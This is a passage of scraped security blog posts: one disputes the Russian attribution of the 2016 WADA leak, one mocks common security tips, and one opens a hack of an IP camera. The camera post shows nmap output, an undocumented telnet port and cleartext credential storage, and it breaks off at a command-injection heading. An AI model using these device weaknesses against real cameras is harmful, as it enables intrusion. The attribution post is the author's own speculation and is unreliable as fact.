<li>Private servers sharing the IP address with previous attacks attributed to Fancy Bear (where the server is not a hacked server or a proxy used by multiple parties)</li>
<li>E-mail addresses used to register the domain attributed to Fancy Bear</li>
<li>Many other things</li>
</ul>
<div>
For me, it is quite strange that after such <a href="https://www.threatconnect.com/blog/guccifer-2-0-dnc-breach/" target="_blank">great analysis on Guccifer 2.0</a>, the Threatconnect guys came up with this low-value post. </div>
<div>
<br /></div>
<br />
<h3>
The fancybear website</h3>
It is quite unfortunate that the analysis was not updated after the documents have been leaked. But let's just have a look at the fancybear . net website, shall we?<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SIb9px9ehyphenhyphenivaxJDN-0wj_MMikxAzUBuXmIyfEI4NAAP7AtJqfwEmUHmqQE4RvuAIa7v47LuZH9w_UHJDDZAcVxOZcBBjSr1srW8ibXvLVHs33YZ9uZczlb2sJ87qkoM-xLnacL0I7ux/s1600/screencapture-fancybear-net-1476519267721.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9SIb9px9ehyphenhyphenivaxJDN-0wj_MMikxAzUBuXmIyfEI4NAAP7AtJqfwEmUHmqQE4RvuAIa7v47LuZH9w_UHJDDZAcVxOZcBBjSr1srW8ibXvLVHs33YZ9uZczlb2sJ87qkoM-xLnacL0I7ux/s400/screencapture-fancybear-net-1476519267721.png" width="130" /></a></div>
<br />
Now the question is, if you are a Russian state-sponsored hacker group, and you are already accused of the hack itself, do you create a website with tons of bears on the website, and do you choose the same name (Fancy Bear) for your "Hack team" that is already used by Crowdstrike to refer to a Russian state-sponsored hacker group? Well, for me, it makes no sense. Now I can hear people screaming: "The Russians changed tactics to confuse us". Again, it makes no sense to change tactics on this, while keeping tactics on the "evidence" found by Threatconnect.<br />
<br />
It makes sense that a Russian state-sponsored group creates a fake persona, names it Guccifer 2.0, pretends Guccifer 2.0 is from Romania, but in the end it turns out Guccifer 2.0 isn't a native Romanian speaker. That really makes sense.<br />
<br />
What happens when someone creates this fancybear website for leaking the docs, and from the Twitter account reaches out to the media? Journalists check the website, they see it was done by Fancy Bear, they <strike>Bing</strike> Google this name, and clearly see it is a Russian state-sponsored hacker group. Some journalists also found the Threatconnect report, which seems very convincing for the first read. I mean, it is a work of experts, right? So you can write in the headlines that the hack was done by the Russians.<br />
<br />
Just imagine an expert in the USA or Canada writing in report for WADA:<br />
"the hack was done by non-Russian, but state-sponsored actors, who planted a lot of false-flags to accuse the Russians and to destroy confidence in past and future leaks". Well, I am sure this is not a popular opinion, and whoever tries this, risks his career. Experts are human, subject to all kinds of bias.<br />
<br />
<h3>
The Guardian</h3>
The only other source I was able to find is from The Guardian, where not just one side (it was Russia) was represented in the article. It is quite unfortunate that both experts are from Russia - so people from USA will call them being not objective on the matter. But the fact that they are Russian experts does not mean they are not true ...<br />
<br />
<a href="https://www.theguardian.com/sport/2016/sep/15/fancy-bears-hackers--russia-wada-tues-leaks">https://www.theguardian.com/sport/2016/sep/15/fancy-bears-hackers--russia-wada-tues-leaks</a><br />
<br />
Sergei Nikitin:<br />
“We don’t have this in the case of the DNC and Wada hacks, so it’s not clear on what basis conclusions are being drawn that Russian hackers or special services were involved. It’s done on the basis of the website design, which is absurd,” he said, referring to the depiction of symbolically Russian animals, brown and white bears, on the “Fancy Bears’ Hack Team” website.<br />
<br />
I don't agree with the DNC part, but this is not the topic of conversation here.<br />
<br />
Alexander Baranov:<br />
"the hackers were most likely amateurs who published a “semi-finished product” rather than truly compromising information. “They could have done this more harshly and suddenly,” he said. “If it was [state-sponsored] hackers, they would have dug deeper. Since it’s enthusiasts, amateurs, they got what they got and went public with it.”"<br />
<br />
<h3>
The @anpoland side-track</h3>
First please check the tas-cas.org hack <a href="https://www.youtube.com/watch?v=day5Aq0bHsA%C2%A0" target="_blank">https://www.youtube.com/watch?v=day5Aq0bHsA </a> , I will be here when you finished it. This is a website for "Court of Arbitration for Sport’s", and referring to the Threatconnect post, "CAS is the highest international tribunal that was established to settle disputes related to sport through arbitration. Starting in 2016, an anti-doping division of CAS began judging doping cases at the Olympic Games, replacing the IOC disciplinary commission." Now you can see why this attack is also discussed here.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSWeSEyy6aiIoM5xkygPpmgXNcf3_5HL9ywgn7wFoFIv6kTpVmzsxVvbbOt57bzuJs2vBqhezuUbn28WcLRFK_hIOfFlrNucmR1_XDU5YTg3jNGySY2VPLxLSWFw_N-lfC9ags3Q-6zsy/s1600/anpoland.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="159" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKSWeSEyy6aiIoM5xkygPpmgXNcf3_5HL9ywgn7wFoFIv6kTpVmzsxVvbbOt57bzuJs2vBqhezuUbn28WcLRFK_hIOfFlrNucmR1_XDU5YTg3jNGySY2VPLxLSWFw_N-lfC9ags3Q-6zsy/s320/anpoland.png" width="320" /></a></div>
<br />
<br />
<ul>
<li>My bet is that this machine was set-up for these @anpoland videos only. Whether google.ru is a false flag or it is real, hard to decide. It is interesting to see that there is no google search done via google.ru, it is used only once. </li>
<li>The creator of the video can't double click. Is it because he has a malfunctioning mouse? Is it because he uses a virtualization console, which is near-perfect OPSEC to hide your real identity? My personal experience is that using virtualization consoles remotely (e.g. RDP) has very similar effects to what we can see on the video. </li>
<li>The timeline of the Twitter account is quite strange, registered in 2010</li>
<li>I agree with the Threatconnect analysis that this @anpoland account is probably a faketivist, and not an activist. But who is behind it, remains a mystery. </li>
<li>Either the "activist" is using a whonix-like setup for remaining anonymous, or a TOR router (something like <a href="https://makezine.com/projects/browse-anonymously-with-a-diy-raspberry-pi-vpntor-router/" target="_blank">this</a>), or does not care about privacy at all. Looking at the response times (SQLmap, web browser), I doubt this "activist" is behind anything related to TOR. Which makes no sense for an activist, who publishes his hack on Youtube. People are stupid for sure, but this does not add up. It makes sense that this was a server (paid by bitcoins or stolen credit cards or whatever) rather than a home computer.</li>
</ul>
<div>
For me, this whole @anpoland thing makes no sense, and I think it is just loosely connected to the WADA hack. </div>
<br />
<h3>
The mysterious Korean characters in the HTML source</h3>
<div>
There is another interesting flag in the whole story, which actually makes no sense. When the website was published, there were Korean characters in HTML comments. </div>
<div>
<a href="https://web.archive.org/web/20160913013727/http://fancybear.net/">https://web.archive.org/web/20160913013727/http://fancybear.net/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5aJazC820r4MWl6HHjk8G0si1ShqC78JB_kyKbEqaQqD0420aXz2I2Ip49kWKkpPDyJlDqjWOg775J-sFEcf5TurvYEswLiEvtTifI3qXW9Cf8OfTZoydwOG8Ira1Vz7g9Q9KNkpLxRc/s1600/korean1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR5aJazC820r4MWl6HHjk8G0si1ShqC78JB_kyKbEqaQqD0420aXz2I2Ip49kWKkpPDyJlDqjWOg775J-sFEcf5TurvYEswLiEvtTifI3qXW9Cf8OfTZoydwOG8Ira1Vz7g9Q9KNkpLxRc/s320/korean1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
When someone pointed this out on Twitter, these Korean HTML comments disappeared:</div>
<div>
<a href="https://web.archive.org/web/20160914231209/http://www.fancybear.net/">https://web.archive.org/web/20160914231209/http://www.fancybear.net/</a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGy3sl1TABE29tC197UqZX7j_0krjYYQKNTcvBy6japNt3QQGG2rUQcrMD4DEHsheuT6i7DTYp04rc6p9PIjzgFrC-3qj_FiKUFNkMXOalh026GxgB94wjPx1MuJfbpN6p7F_aPMPw81Z/s1600/korean2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGy3sl1TABE29tC197UqZX7j_0krjYYQKNTcvBy6japNt3QQGG2rUQcrMD4DEHsheuT6i7DTYp04rc6p9PIjzgFrC-3qj_FiKUFNkMXOalh026GxgB94wjPx1MuJfbpN6p7F_aPMPw81Z/s320/korean2.png" width="320" /></a></div>
<div>
These HTML comments look like generated HTML comments, from a WYSIWYG editor, which is using the Korean language. Let me know if you can identify the editor.</div>
<div>
<br /></div>
<h3>
The Russians are denying it</h3>
<div>
Well, what choice they have? It does not matter if they did this or not, they will deny it. And they can't deny this differently. Just imagine a spokesperson: "Previously we have falsely denied the DCC and DNC hacks, but this time please believe us, this wasn't Russia." Sounds plausible ...<br />
<br /></div>
<h3>
Attribution</h3>
Let me sum up what we know:<br />
<br />
It makes sense that the WADA hack was done by Russia, because:<br />
<br />
<ol>
<li>Russia being almost banned from the Olympics due to doping scandal, it made sense to discredit WADA and US Olympians</li>
<li>There are multiple(weak) pieces of evidence which point to Russia</li>
</ol>
<div>
It makes sense that the WADA hack was not done by Russia, because: </div>
<div>
<ol>
<li>By instantly attributing the hack to the Russians, the story was more about to discredit Russia than discrediting WADA or US Olympians.</li>
<li>In reality, there was no gain for Russia for disclosing the documents. Nothing happened, nothing changed, no discredit for WADA. Not a single case turned out to be illegal or unethical.</li>
<li><strike>Altering the leaked documents makes no sense if it was Russia</strike> (see update at the end). Altering the leaked documents makes a lot of sense if it was not Russia. Because from now on, people can always state "these leaks cannot be trusted, so it is not true what is written there". It is quite cozy for any US organization, who has been hacked or will be hacked. If you are interested in the "Russians forging leaked documents" debate, I highly recommend to start with this <a href="https://theintercept.com/2016/10/11/in-the-democratic-echo-chamber-inconvenient-truths-are-recast-as-putin-plots/" target="_blank">The Intercept</a> article</li>
<li>If the Korean characters were false flags planted by the Russians, why would they remove it? If it had been Russian characters, I would understand removing it.</li>
<li>All evidence against Russia is weak, can be easily forged by even any script kittie.</li>
</ol>
<div>
<br /></div>
I don't like guessing, but here is my guess. This WADA hack was an operation of a (non-professional) hackers-for-hire service, paid by an enemy of Russia. The goal was to hack WADA, leak the documents, modify some contents in the documents, and blame it all on the Russians ...<br />
<br />
<h3>
Questions and answers</h3>
</div>
<div>
<ul>
<li>Was Russia capable of doing this WADA hack? Yes.</li>
<li>Was Russia hacking WADA? Maybe yes, maybe not.</li>
<li>Was this leak done by a Russian state-sponsored hacker group? I highly doubt that.</li>
<li>Is it possible to buy an attribution-dice where all six-side is Russia? No, it is sold-out. </li>
</ul>
</div>
<div>
<br /></div>
<div>
To quote Patrick Gray: "Russia is the new China, and the Russians ate my homework."©</div>
<div>
<br /></div>
<div>
Let me know what you think about this, and please comment. </div>
<div>
<br /></div>
<div>
Update: As TheGrugq pointed out, Guccifer has been found to alter documents <a href="https://www.reddit.com/r/EnoughTrumpSpam/comments/4uyih3/russian_hackers_altered_emails_before_release_to/?st=IUJDLSIE&sh=e195e908" style="font-family: 'Helvetica Neue Light', HelveticaNeue-Light, helvetica, arial, sans-serif;">https://www.reddit.com/r/EnoughTrumpSpam/comments/4uyih3/russian_hackers_altered_emails_before_release_to/?st=IUJDLSIE&sh=e195e908</a></div>
</div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com0tag:blogger.com,1999:blog-7429675726481888518.post-13641171423327421442016-06-11T14:56:00.000+02:002019-10-08T15:36:22.000+02:00One reason why InfoSec sucked in the past 20 years - the "security tips" myth<div style="text-align: justify;">
From time to time, I get disappointed how much effort and money is put into securing computers, networks, mobile phones, ... and yet in 2016 here we are, where not much has changed on the defensive side. There are many things I personally blame for this situation, and one of them is the security tips.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The goal of these security tips is that if the average user follows these easy to remember rules, their computer will be safe. Unfortunately, by the time people integrate these rules into their daily life, these rules either become outdated, or these rules were so oversimplified that it was never true in the first place. Some of these security tips might sound ridiculous to people in InfoSec nowadays, but this is exactly what people still remember because we told them so for years.</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
PDF is safe to open</h3>
<div style="text-align: justify;">
This is an oldie. I think this started at the time of macro viruses. Still, people think opening a PDF from an untrusted source is safer than opening a Word file. For details why this is not true, check: https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-497/Adobe-Acrobat-Reader.html</div>
<div style="text-align: justify;">
On an unrelated note, people still believe PDF is integrity protected because the content cannot be changed (compared to a Word document).</div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbrVz8Zrs5VzozDjnxzndT9E6QLrMjPLD5dAggrCCjHFb4jjLSMTk4ZK8uvqMuDLx6shO2HJzfN44PpJoUc17z6mzgmZH1Qse60WLxbeUDZhAwk7szS9gRF2SDmJrOc4eFUHwQkY4Ww536/s1600/pdf_blog_title.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbrVz8Zrs5VzozDjnxzndT9E6QLrMjPLD5dAggrCCjHFb4jjLSMTk4ZK8uvqMuDLx6shO2HJzfN44PpJoUc17z6mzgmZH1Qse60WLxbeUDZhAwk7szS9gRF2SDmJrOc4eFUHwQkY4Ww536/s200/pdf_blog_title.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image stolen from Kaspersky</td></tr>
</tbody></table>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Java is secure</h3>
<div>
<div style="text-align: justify;">
One of the best ones. Oracle started marketing Java as a safe language, where buffer overflows, format strings and pointer-based vulnerabilities are gone. Unfortunately, they forgot to tell the world that instead of "unsafe programs developed by others" they installed their unsafe program on 3 billion devices. </div>
</div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7zOEyY3L5mCbvWhMgvq2IfJeH72viTvWcsnxommhRW-USDY7Ggkn7Qv57DAS0aTsLbNGBoLw6sNNQ1EflwMiS2NaI9xnNlwHkYCRRwysdc0O_orOGzxPv7feGLgGCER42xSXsuz1FmZt/s1600/Jteqd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhD7zOEyY3L5mCbvWhMgvq2IfJeH72viTvWcsnxommhRW-USDY7Ggkn7Qv57DAS0aTsLbNGBoLw6sNNQ1EflwMiS2NaI9xnNlwHkYCRRwysdc0O_orOGzxPv7feGLgGCER42xSXsuz1FmZt/s200/Jteqd.png" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Stay away from rogue websites and you will be safe</h3>
<div style="text-align: justify;">
This is a very common belief I hear from average people. "I only visit some trusted news sites and social media, I never visit those shady sites." I have some bad news. At the time of <a href="https://www.google.com/search?q=malvertising" target="_blank">malvertising </a>and infected websites, you don't have to visit those shady sites anymore to get infected.</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
Don't use open WiFi</h3>
<div style="text-align: justify;">
I have a very long explanation of why this makes no sense, see <a href="http://jumpespjump.blogspot.hu/2015/07/mythbusters-is-open-unencrypted-wifi.html" target="_blank">here</a>. Actually, the whole recommendation makes no sense as people will connect to public WiFis, no matter what we (InfoSec) recommend.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaSU6bMLQ0T61-W45zIZrkmvRlCHtgsRgzD-j6JWs7CBnb9al74DqK8EMFD3zW2PXxZ5eDbjiTfsTEu88R7DD3O2HQAEFQDJ8Wn5jiqP43SmzcSWDRH3AA7RbM7_dz1Y39OL1zPhb_g9t2/s1600/205975-free_wifi_wireless_original.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="148" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaSU6bMLQ0T61-W45zIZrkmvRlCHtgsRgzD-j6JWs7CBnb9al74DqK8EMFD3zW2PXxZ5eDbjiTfsTEu88R7DD3O2HQAEFQDJ8Wn5jiqP43SmzcSWDRH3AA7RbM7_dz1Y39OL1zPhb_g9t2/s200/205975-free_wifi_wireless_original.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
The password policy nightmare</h3>
<div style="text-align: justify;">
Actually, this topic has been covered by myself in two blog posts, see <a href="http://jumpespjump.blogspot.hu/2014/10/change-passwords-regularly-myth-and-lie.html" target="_blank">here </a>and <a href="http://jumpespjump.blogspot.hu/2014/10/change-passwords-regularly-myth-and-lie_13.html" target="_blank">here</a>. Long story short: use a password manager and 2-factor authentication wherever possible. Let the password manager choose the password for you. And last but not least, corporate password policy sux.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH_S8D73Zef5WBaMX2Mq733LvUsDtLLtKpeAe0xV4XlmZTNVOUm3wVIfiUPcM0G9ko3HB2bTjIG1qfOcqhOcrw5Enb5BFLj_MeQimDjFUQtYqxR23I6vEjKqIlun71Wkf5aPUfwQ158PMW/s1600/df826c798b30070ed3bbbe5dba776e35.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH_S8D73Zef5WBaMX2Mq733LvUsDtLLtKpeAe0xV4XlmZTNVOUm3wVIfiUPcM0G9ko3HB2bTjIG1qfOcqhOcrw5Enb5BFLj_MeQimDjFUQtYqxR23I6vEjKqIlun71Wkf5aPUfwQ158PMW/s200/df826c798b30070ed3bbbe5dba776e35.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Sites with a padlock are safe</h3>
<div>
<div style="text-align: justify;">
We tell people for years that the communication with HTTPS sites are safe, and you can be sure it is HTTPS by finding a randomly changing padlock icon somewhere next to the URL. What people hear is that sites with padlocks are safe. Whatever that means. The same goes for WiFi - a network with a padlock is safe.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb4BPok-1la3IGEeEpzLTDpybotQM-S-FLW12Zvfj1o0j949JpyaU3V_thZz8-e8b8i1IMUlv_J4eBQ9ZHSTF6oCsN2prxrlp5bAputWdZcyxSaKP21O6liTlQ-aEAqMEGqV_M_uj6b_At/s1600/computer-internet-security1-560x420.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgb4BPok-1la3IGEeEpzLTDpybotQM-S-FLW12Zvfj1o0j949JpyaU3V_thZz8-e8b8i1IMUlv_J4eBQ9ZHSTF6oCsN2prxrlp5bAputWdZcyxSaKP21O6liTlQ-aEAqMEGqV_M_uj6b_At/s200/computer-internet-security1-560x420.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Use Linux, it is free from malware</h3>
<div>
<div style="text-align: justify;">
For years people told to Windows users that only if they would use Linux they won't have so much malware. Thanks to Android, now everyone in the world can enjoy malware on his/her Linux machine.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17E8fnZno6fMUT_lyPa5HTrhtOQ4eRCuqzSGhq5JjZ5pZbmq9L5xknoX9BTURqHGjTj3wvW_-fhSgxHWY-OJEr7SRjQI1scYggDIeONn6EI1eAL9VTJmcJAHbZJVEvfutJ6_zKi3SDN3O/s1600/android-evil.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17E8fnZno6fMUT_lyPa5HTrhtOQ4eRCuqzSGhq5JjZ5pZbmq9L5xknoX9BTURqHGjTj3wvW_-fhSgxHWY-OJEr7SRjQI1scYggDIeONn6EI1eAL9VTJmcJAHbZJVEvfutJ6_zKi3SDN3O/s200/android-evil.png" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
OSX is free from malware</h3>
<div>
<div style="text-align: justify;">
It is true that there is significantly less malware on OSX than on Windows, but this is an "economical" question rather than a "security" one. The more people use OSX, the better target it will become. Some people even believe they are safe from phishing because they are using a Mac!</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjy_eCj2VBHj5yohfZm3MuktGj13GtdqUvt4HADhCdSvnVH3oRSCJNv2tM5Y5l-F7DH4suB_5WUT0CsVsnlL_D8V2m_XPn0xXuOLJqlrbPDNOlgTymHRTxUoiL91tOS9_AJNEejzH0o_98/s1600/ThreatMetrix-Discusses-Sophisticated-Malware-Targeting-OS-X-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjy_eCj2VBHj5yohfZm3MuktGj13GtdqUvt4HADhCdSvnVH3oRSCJNv2tM5Y5l-F7DH4suB_5WUT0CsVsnlL_D8V2m_XPn0xXuOLJqlrbPDNOlgTymHRTxUoiL91tOS9_AJNEejzH0o_98/s200/ThreatMetrix-Discusses-Sophisticated-Malware-Targeting-OS-X-2.jpg" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
</div>
<h3 style="text-align: justify;">
Updated AV + firewall makes me 100% safe</h3>
<div>
<div style="text-align: justify;">
There is no such thing as 100% safe, and unfortunately, nowadays most malware is written for PROFIT, which means it can bypass these basic protections for days (or weeks, months, years). The more proactive protection is built into the product, the better!</div>
</div>
<h3>
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
How to backup data</h3>
<div style="text-align: justify;">
Although this is one of the most important security tips which is not followed by people, my problem here is not the backup data advise, but how we as a community failed to provide easy to use ways to do that. Now that crypto-ransomware is a real threat to every Windows (and some OSX) users, even those people who have backups on their NAS can find their backups lost. The only hope is that at least OSX has Time Machine which is not targeted yet, and the only backup solution which really works.</div>
<div style="text-align: justify;">
The worst part is that we even created NAS devices which can be infected via worms ...</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_laa_fEhq_zwUU_JDrpuXXSXXrru6VcY6anMvxVGhz5Y3nUmBtfT36eWnOLaWzzhw4qh0Fq68EL6DBk7T_FM3-YE1KqDEmjb9dLY1W8hSvIdDRPt2Js-3smMIycY5q2mcTz2gwuDIEaOO/s1600/synolocker.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_laa_fEhq_zwUU_JDrpuXXSXXrru6VcY6anMvxVGhz5Y3nUmBtfT36eWnOLaWzzhw4qh0Fq68EL6DBk7T_FM3-YE1KqDEmjb9dLY1W8hSvIdDRPt2Js-3smMIycY5q2mcTz2gwuDIEaOO/s200/synolocker.png" width="200" /></a></div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
Disconnect your computer from the Internet when not used</h3>
<div>
<div style="text-align: justify;">
There is no need to comment on this. Whoever recommends things like that, clearly has a problem.</div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
Use (free) VPN to protect your anonimity</h3>
<div>
<div style="text-align: justify;">
First of all. There is no such thing as <a href="https://www.safervpn.com/blog/use-free-vpn-hola-risks-cybercrime/" target="_blank">free service</a>. If it is free, you are the service. On another hand, a non-free VPN can <a href="https://www.mrg-effitas.com/how-your-vpn-can-be-a-front-door-access-to-your-system/" target="_blank">introduce new vulnerablities</a>, and they won't protect your anonymity. It replaces one ISP with another (your VPN provider). Even TOR cannot guarantee anonymity by itself, and VPNs are much worse.</div>
</div>
<h2>
</h2>
<h2 style="text-align: justify;">
The corporate "security tips" myth</h2>
<div>
<div style="text-align: justify;">
"Luckily" these toxic security tips have infected the enterprise environment as well, not just the home users.</div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
Use robots.txt to hide secret information on public websites</h3>
<div>
<div style="text-align: justify;">
It is 2016 and somehow web developers still believe in this nonsense. And this is why this is usually the first to check on a website for penetration testers or attackers.</div>
<div style="text-align: justify;">
<br /></div>
<h3 style="text-align: justify;">
My password policy is safer than ever</h3>
</div>
<div>
<div style="text-align: justify;">
As previously discussed, passwords are bad. Very bad. And they will stick with us for decades ...</div>
</div>
<h3>
</h3>
<h3>
</h3>
<h3 style="text-align: justify;">
Use WAF, IDS, IPS, Nextgen APT detection hibber-gibber and you will be safe</h3>
<div>
<div style="text-align: justify;">
Companies should invest more in people and less into magic blinking devices.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Instead of shipping computers with bloatware, ship computers with exploit protection software</div>
<div style="text-align: justify;">
Teach people how to use a password safe</div>
<div style="text-align: justify;">
Teach people how to use 2FA</div>
<div style="text-align: justify;">
Teach people how to use common-sense</div>
<div style="text-align: justify;">
<br /></div>
<h2 style="text-align: justify;">
Conclusion</h2>
<div>
<div style="text-align: justify;">
Computer security is complex, hard and the risks change every year. Is this our fault? Probably. But these kinds of security tips won't help us save the world. </div>
</div>
<div style="text-align: justify;">
<br /></div>
Zhttp://www.blogger.com/profile/12373001166765443215noreply@blogger.com1tag:blogger.com,1999:blog-7429675726481888518.post-1523273486707663942015-09-26T14:02:00.000+02:002020-02-05T12:11:59.795+01:00How I hacked my IP camera, and found this backdoor account<div style="text-align: justify;">
The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.</div>
<div style="text-align: justify;">
<br />
Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.</div>
<h2 style="text-align: justify;">
The obvious problems</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAKaKDWecDRh60dplK0yAH_7f9CfU30NGTQUoO9MnxxXH4zpaMu_14f8KUy-Vz4hAE12gA493M-0-YxOD5R91PKcXylW-Kbw6Q0Pd1URi8i2cXV6NmXHeUrz21jx5U7w5xap94f7Cp8GS1/s1600/em.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAKaKDWecDRh60dplK0yAH_7f9CfU30NGTQUoO9MnxxXH4zpaMu_14f8KUy-Vz4hAE12gA493M-0-YxOD5R91PKcXylW-Kbw6Q0Pd1URi8i2cXV6NmXHeUrz21jx5U7w5xap94f7Cp8GS1/s200/em.png" width="200" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. </div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in </div>
<div style="text-align: justify;">
"C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"</div>
</div>
<div>
<div style="text-align: justify;">
<br /></div>
</div>
<div>
<div style="text-align: justify;">
This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.</div>
</div>
<div>
<br /></div>
<div>
Let's run a quick nmap on this device.</div>
<pre>PORT STATE SERVICE VERSION
23/tcp open telnet BusyBox telnetd
81/tcp open http GoAhead-Webs httpd
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Document Error: Unauthorized
8600/tcp open tcpwrapped
</pre>
<div>
<div style="text-align: justify;">
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.</div>
<br />
<h2>
The double-blind command injection</h2>
</div>
<div>
<div style="text-align: justify;">
